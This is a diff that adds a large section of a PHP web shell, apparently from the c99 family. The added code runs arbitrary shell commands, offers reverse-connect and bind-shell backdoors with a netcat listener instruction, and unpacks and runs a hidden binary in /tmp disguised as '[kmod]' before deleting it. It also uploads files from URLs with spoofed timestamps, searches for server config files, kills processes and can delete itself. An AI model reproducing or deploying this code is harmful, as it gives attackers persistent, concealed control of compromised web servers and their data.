+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
